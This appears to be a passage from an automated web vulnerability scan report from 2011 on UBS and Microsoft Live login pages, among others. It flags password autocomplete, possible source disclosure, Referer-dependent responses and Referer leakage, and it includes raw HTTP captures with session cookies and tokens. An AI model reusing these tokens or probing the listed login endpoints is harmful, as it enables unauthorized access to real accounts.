GET /olsauth/ex/pbl/ubso/dfu HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815; NavLB_PQ=quotes-public1.ubs.com

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:52:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 28205

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                                   <form name="forgotUserNameForm" method="post" action="/olsauth/ex/pbl/ubso/pfu">


   <TABLE cellSpacing="0" cellPadding="0" width="100%" border="0">
...[SNIP]...
<TD width="50%">
<input type="password" name="userPassword" maxlength="15" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
                       </TD>
...[SNIP]...

11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dfu

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:52:26 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 28205

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dl

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

GET /olsauth/ex/pbl/ubso/dl HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981866345:ss=1309981804815

Response

HTTP/1.1 200 OK
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 13:51:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
Content-Length: 32341

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/pfu

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

The form contains the following password field with autocomplete enabled:

userPassword

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                                   <form name="forgotUserNameForm" method="post" action="/olsauth/ex/pbl/ubso/pfu">


   <TABLE cellSpacing="0" cellPadding="0" width="100%" border="0">
...[SNIP]...
<TD width="50%">
<input type="password" name="userPassword" maxlength="15" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
                       </TD>
...[SNIP]...

11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/pfu

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

GET /olsauth/ex/pbl/ubso/pfu HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/pl

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

GET /olsauth/ex/pbl/ubso/pl HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

12. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://onlineservices.ubs.com
Path:	/olsauth/public/common/js/olsauth.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /olsauth/public/common/js/olsauth.js HTTP/1.1
Host: onlineservices.ubs.com
Connection: keep-alive
Referer: https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
content-language: en
content-length: 659
content-type: application/x-javascript
date: Wed, 06 Jul 2011 13:51:22 GMT
last-modified: Mon, 27 Jun 2011 20:36:12 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

   //if (self != top) {
   //        top.sofReason('<%=WebConstants.LOGOUT_STATUS_CODE_SESSIONEND_LOGOUT %>')
   //}

   function cancelRequest(url)
   {
       var r=confirm("If you exit this process now, your changes will not be saved."
                    +'\n'+ "Select \"OK\" to exit.");

       if (r==true)
...[SNIP]...

13. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bstats.adbrite.com
Path:	/adserver/behavioral-data/0

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

Response 1

Request 2

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:09 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Wed, 06-Jul-2011 15:39:09 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:09 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14. Cross-domain POST previous next
There are 4 instances of this issue:

https://accountservices.passport.net/uiresetpw.srf
https://blog.metricstream.com/
https://login.live.com/resetpw.srf
https://login.live.com/resetpw.srf

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

14.1. https://accountservices.passport.net/uiresetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accountservices.passport.net
Path:	/uiresetpw.srf

Issue detail

The page contains a form which POSTs data to the domain login.live.com. The form contains the following fields:

PPSX
PwdPad
login
HIPSolution
cancel
Continue
PPFT

Request

POST /uiresetpw.srf?mkt=EN-US&lc=1033&id=75046 HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://login.live.com/resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&bk=1309951118&mkt=EN-US&lc=1033
Content-Length: 1592
Cache-Control: max-age=0
Origin: https://login.live.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

mspppostint=CcpFZF1pzFJJ35c22EExnN3DcZnRhoC6rxnyDE0w1z4L4rRIFCpyqXea8TPp7BQBhPwTisg4E%2BUO97pJuQcu5vYrjWFOFSp8G8Ba%2FSB6LD595uTlbLDuSzbJtTZEcIO%2BYxTR4dr0WyWrpjp5u6DEX6jSYwnJRudSTtiRd8rmgW2zSNkO72JClg
...[SNIP]...

Response

14.2. https://blog.metricstream.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blog.metricstream.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32336

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>


<link rel="
...[SNIP]...
<div class="textwidget"><form style="border:1px solid #ccc;padding:3px;text-align:center;" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=MetricStreamGRC', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><p>
...[SNIP]...

14.3. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

mspppostint

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 1188
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-29963a3f-5394-45f4-bae8-74e78c1fc111; path=/;version=1
Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1E56 V: 0
Date: Wed, 06 Jul 2011 11:21:04 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CeZJBLppJSTf0nRGcbVLfTH64e4BQKcCN+sGr3IfsQx0r0rtRVpcqOY5uQ9T8uC9M7LeAOhUNj20lBQ87DRIZyXqLjMRQwLV2xuDHb1Du3YZn3vEhlh+cWO2fpfHjq3yJUQmCJ0Up
...[SNIP]...

14.4. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The page contains a form which POSTs data to the domain accountservices.passport.net. The form contains the following fields:

mspppostint

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...
<body onload="javascript:DoSubmit();"><form name="fmHF" id="fmHF" action="https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046" method="post" target="_top"><input type="hidden" name="mspppostint" id="mspppostint" value="CclpRiFnsre6ebJEDDCZLzIMlepyYzj8F8c2CvnnERgk2WZF8dJ4U/e0cE9J8sWwrnh8r/ohqTOcF/IqcOZ1nIfyNsbXqRBaXECDZOapZDbLZoizpS0g1hemOpQIJi9gB1+buPj/9
...[SNIP]...

15. Cross-domain Referer leakage previous next
There are 29 instances of this issue:

https://accountservices.passport.net/gethip.srf
https://accountservices.passport.net/uiresetpw.srf
http://ad.doubleclick.net/adi/N3285.google/B2343920.122
http://ad.doubleclick.net/adj/bzj.techflash/
http://ad.doubleclick.net/adj/bzj.techflash/
http://ad.doubleclick.net/adj/bzj.techflash/home_page
http://ad.doubleclick.net/adj/bzj.techflash/home_page
http://adonmax.com/afr.php
http://bcp.crwdcntrl.net/px
http://bp.specificclick.net/
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://digg.com/submit
http://go.microsoft.com/fwlink/
http://googleads.g.doubleclick.net/pagead/ads
http://jqueryui.com/themeroller/
http://live.zune.net/signin.ashx
http://live.zune.net/signin.ashx
http://live.zune.net/signin.ashx
https://login.live.com/login.srf
https://login.live.com/ppsecure/post.srf
http://p.brilig.com/contact/bct
http://pinpoint.microsoft.com/en-US/Default.aspx
http://promote.orkut.com/preview
http://pubads.g.doubleclick.net/gampad/ads
http://pubads.g.doubleclick.net/gampad/ads
http://pubads.g.doubleclick.net/gampad/ads
http://s.bebo.com/c/site/index20_script.js
http://s.bebo.com/js/mediaboxAdv-1.3.4b.js

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. https://accountservices.passport.net/gethip.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accountservices.passport.net
Path:	/gethip.srf

Issue detail

The page was loaded from a URL containing a query string:

https://accountservices.passport.net/gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual

The response contains the following link to another domain:

https://secure.shared.live.com/~Live.SiteContent.ID/~16.1.10/~/~/~/~/images/icon_err.gif'+i+'

Request

Response

15.2. https://accountservices.passport.net/uiresetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accountservices.passport.net
Path:	/uiresetpw.srf

Issue detail

The page was loaded from a URL containing a query string:

https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046

The response contains the following links to other domains:

https://live.zune.net/xweb/passport/bottomCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0
https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 10386
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:05 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
PPServer: PPV: 30 H: BAYIDSPROF1D07 V: 0
Date: Wed, 06 Jul 2011 11:21:05 GMT
Connection: close



<html dir="ltr"><head><meta http-equiv="Con
...[SNIP]...
<td colspan="3"><iframe src="https://live.zune.net/xweb/passport/topCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="260" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6000"></iframe>
...[SNIP]...
<td valign="top" class="css9993"><iframe src="https://live.zune.net/xweb/passport/leftCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="90" height="390" frameborder="0" scrolling="no" align="top" marginwidth="0" marginheight="0" name="i6001"></iframe>
...[SNIP]...
<td valign="top" class="css9995"><iframe src="https://live.zune.net/xweb/passport/rightCB.aspx?B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cbpage=resetpwd&mkt=EN-US&lc=1033&x=11.0.18163.0" width="100%" height="390" frameborder="0" scrolling="auto" align="top" marginwidth="0" marginheight="0" name="i6002"></iframe>
...[SNIP]...
